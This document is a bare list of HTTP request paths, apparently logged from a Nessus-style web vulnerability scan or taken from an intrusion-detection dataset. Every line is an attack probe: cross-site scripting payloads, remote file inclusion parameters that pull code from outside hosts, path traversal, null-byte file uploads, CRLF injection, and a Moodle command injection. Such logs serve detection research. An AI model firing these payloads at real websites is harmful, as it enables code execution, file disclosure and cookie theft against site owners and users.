/33y9gcqq.kspx?<script>document.cookie="testnvxc=4301;"</script>
/jnv890lt.cgi?<script>cross_site_scripting.nasl</script>
/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.96:8080/4dckqcc0acprbz??
/7uz3ok60.php3?<script>cross_site_scripting.nasl</script>
/style></script><script>alert(0x000123)</script>
/?<script>document.cookie="testmybc=2088;"</script>
/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/aqongcl.jsp\x00
/hrttz9fj.x?<script>document.cookie="testtbjy=7334;"</script>
/../../../../../../../conf/server.xml
/e9rx3ya4.idc?<script>cross_site_scripting.nasl</script>
/p043snfr.exe?<script>cross_site_scripting.nasl</script>
/<script>document.cookie="testjnre=7328;"</script>
/bxnyrhmh.htm?<script>document.cookie="testmjct=1867;"</script>
/examples/jsp/jsp2/el/login.php?course="><script>alert(atutor_xss.nasl)</script>
/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/moclyxlwqyfjnp?
/169okeyj.kspx?<script>document.cookie="testxeoi=3573;"</script>
/main.php?frm_daynight=day&frm_passwd=q15634621&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=&scr_width=
/en-us/jnv890lt.pl?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/txenjrxf3?\x00
/9kr0ih0v.html?<script>document.cookie="testzgnm=1183;"</script>
/cgi-bin/search.php?searchstring=<script>foo</script>
/1qwv2p5p.cgi?<script>document.cookie="testvqcy=252;"</script>
/examples/jsp/sessions/index.php?module=<script>foo</script>
/en-us/oie504mr.mscgi?<script>document.cookie="testtpby=7052;"</script>
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/frznctvhi0i5?'
/i7prbs22.mscgi?<script>document.cookie="testjnre=7328;"</script>
/xfkun1ku.php?<script>cross_site_scripting.nasl</script>
/path_script/createurl.php?formurl=http://192.168.202.118:8080/zz5thkvtmlgl?
/scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/ghl9il?
/en-us/<script>cross_site_scripting.nasl</script>.php3
/scriptpath/index.php?page=http://192.168.202.96:8080/frznctvhi0i5?
/<script>cross_site_scripting.nasl</script>.jsp
/nmw0do67.html?<script>cross_site_scripting.nasl</script>
/en-us/odzk29aa.kspx?<script>document.cookie="testtfvh=2141;"</script>
/igtf0zon.mscgi?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/ghl9il?\x00
/iajtej82.do?<script>cross_site_scripting.nasl</script>
/script>
/inc/formmail.inc.php?script_root=http://192.168.202.118:8080/moclyxlwqyfjnp?
/script%u003e
/scripts/login.php?error=>"><script>alert('daloradius_error_xss.nasl')</script>
/h21y8w52.cfc?<script>cross_site_scripting.nasl</script>
/en-us/esmozg5d.cfm?<script>cross_site_scripting.nasl</script>
/igtf0zon.pl?<script>cross_site_scripting.nasl</script>
/j4oqyvga.jspa?<script>cross_site_scripting.nasl</script>
/5o9zq43e.php?<script>cross_site_scripting.nasl</script>
/script>
/examples/jsp/error/workarea/contentdesigner/ekformsiframe.aspx?id="><script>alert('nessus')</script>
/script//ident/index.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/search.jsp?q=%"<script>alert(1331908697)</script>
/7u1pb2xi.pl?<script>document.cookie="testlwwz=718;"</script>
/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
/6wb70v0b.cgi?<script>cross_site_scripting.nasl</script>
/include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/moclyxlwqyfjnp?
/um7xpn15.cgi?<script>document.cookie="testotoy=6142;"</script>
/169okeyj.nsf?<script>document.cookie="testxeoi=3573;"</script>
/miz4r5hz.nsf?<script>document.cookie="testviqu=1270;"</script>
/qczkquis.cgi?<script>document.cookie="testkwlg=5591;"</script>
/8x6w469u.nsf?<script>document.cookie="testgfjr=1286;"</script>
/en-us/esmozg5d.php3?<script>cross_site_scripting.nasl</script>
/7o5qp766.dll?<script>cross_site_scripting.nasl</script>
/zv8tv7h8.jspa?<script>document.cookie="testcqwz=9752;"</script>
/xsqln7eb.cfc?<script>document.cookie="testpcbb=9254;"</script>
/ghswfouu.cfm?<script>document.cookie="testsqmm=5713;"</script>
/miz4r5hz.mscgi?<script>document.cookie="testviqu=1270;"</script>
/quagynka.jspa?<script>cross_site_scripting.nasl</script>
/onload=confirm(1)></script>
/bn857frh.cfc?<script>cross_site_scripting.nasl</script>
/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
/examples/jsp/jsp2/jspx/usrdetails.php?sgnuptype=csaleid<script>nessus</script>
/init.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??
/oie504mr.cfm?<script>document.cookie="testtpby=7052;"</script>
/examples/jsp/jsp2/elsearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/ygkjkngd.mscgi?<script>document.cookie="testnago=4518;"</script>
/wps/wcm/webinterface/login/login.jsp?"><script>alert("ibm_login_qs_xss.nasl-1331919000")</script>
/..%252f..%252f..%252f..%252f..%252f{FILE}
/j4drbkil.html?<script>cross_site_scripting.nasl</script>
/fmnveedu.nsf?<script>document.cookie="testgfbr=7014;"</script>
/zv8tv7h8.fts?<script>document.cookie="testcqwz=9752;"</script>
/xlj7h65o.jspa?<script>document.cookie="testtbbe=856;"</script>
/x2gyorli.x?<script>document.cookie="testwhac=3130;"</script>
/examples/jsp/jsp2/el/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>
/egaet53a.mscgi?<script>cross_site_scripting.nasl</script>
/oie504mr.mscgi?<script>document.cookie="testtpby=7052;"</script>
/svg>');</script>
/s7qus4g3.pl?<script>cross_site_scripting.nasl</script>
/j4drbkil.fts?<script>cross_site_scripting.nasl</script>
/1r8cfrlf.htm?<script>document.cookie="testydan=5106;"</script>
/7dbjwpw6.aspx?<script>cross_site_scripting.nasl</script>
/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/moclyxlwqyfjnp?
/report.php?scriptpath=http://192.168.202.118:8080/ghl9il??
/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/szlppmq.jsp\x00
/aj3pf49c.asp?<script>document.cookie="testnofv=4170;"</script>
/script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?
/606wkcop.asp?<script>cross_site_scripting.nasl</script>
/script>
/h5sc3gxy.php3?<script>cross_site_scripting.nasl</script>
/miz4r5hz.cgi?<script>document.cookie="testviqu=1270;"</script>
/cgi-bin/search.jsp?q=%"<script>alert(1331909235)</script>
/lmw4r201.exe?<script>document.cookie="testwews=8477;"</script>
/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/2aibfaczmac8??
/ap58k3ci.php3?<script>cross_site_scripting.nasl</script>
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+e0+00+8e+81+0b+01+02+19+00+02+00+00+00+04+00+00+00+00+00+00+00+10+00+00++>>ctdn
/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/tzhfyzkbomspvm?
/script>
/qhvu0pdg.cfm?<script>document.cookie="testchuc=2100;"</script>
/uc3w3bdi.cfc?<script>document.cookie="testxllt=9940;"</script>
/h21y8w52.kspx?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00
/de3v2dd9.html?<script>cross_site_scripting.nasl</script>
/examples/jsp/colors/search.jsp?q=%"<script>alert(1331904374)</script>
/<script>document.cookie="testttvs=7163;"</script>
/cgi-bin/redir.exe?url=http://www.google.com/\x0d\x0a\x0d\x0a<script>alert('vulnerable')</script>
/cgi-bin/search.jsp?q=%"<script>alert(1331905049)</script>
/<script>document.cookie="testviqu=1270;"</script>
/administrator/components/com_feederator/includes/tmsp/subscription.php?globalsmosconfig_absolute_path=http://192.168.202.96:8080/llumt7msyau5y?
/news/include/createdb.php?langfile;=http://192.168.202.118:8080/2aibfaczmac8??
/main.php?frm_daynight=q27938679&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width=
/v3axg1p8.dll?<script>document.cookie="testxagh=6987;"</script>
/j2kdmfw4.php3?<script>cross_site_scripting.nasl</script>
/en-us/i686v90l.htm?<script>document.cookie="testfutf=1550;"</script>
/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008327')</script>
/hrttz9fj.cfc?<script>document.cookie="testtbjy=7334;"</script>
/zln2hm2z.php?<script>document.cookie="testblcp=8120;"</script>
/script>
/u8yiqilu.asp?<script>document.cookie="testswjp=6010;"</script>
/examples/jsp/jsp2/jspx/snpfiltered.pl?t=c&u=<script>foo</script>
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/txenjrxf3?'
/iajtej82.cfc?<script>cross_site_scripting.nasl</script>
/if69ddo1.asp?<script>document.cookie="testiabz=5220;"</script>
/bb000001.pl<script>alert('vulnerable')</script>
/main.php?frm_daynight=day&frm_passwd=q75353854&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=&scr_width=
/nmw0do67.asp?<script>cross_site_scripting.nasl</script>
/rpxyx07v.pl?<script>document.cookie="testbnli=1975;"</script>
/examples/jsp/checkbox/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f
/fc9t54l7.jspa?<script>document.cookie="testggad=2000;"</script>
/ewc3rz1l.cfc?<script>document.cookie="testkgqo=204;"</script>
/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/tzhfyzkbomspvm?
/examples/jsp/colors/login.php?course="><script>alert(atutor_xss.nasl)</script>
